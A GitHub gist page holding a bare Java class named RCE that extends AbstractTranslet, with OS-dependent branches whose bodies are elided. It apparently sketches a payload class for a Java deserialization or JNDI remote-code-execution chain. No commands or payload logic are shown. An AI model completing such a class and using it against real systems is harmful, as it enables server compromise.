Skip to content

Instantly share code, notes, and snippets.

@isaidnocookies
Created January 3, 2022 02:36
Show Gist options
  • Save isaidnocookies/8d2f4eb91da362a57ff2eb3a4486501d to your computer and use it in GitHub Desktop.
Save isaidnocookies/8d2f4eb91da362a57ff2eb3a4486501d to your computer and use it in GitHub Desktop.
public class RCE extends AbstractTranslet
{
public RCE() {
if (File.separator.equals("/")) {
...
} else {
...
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment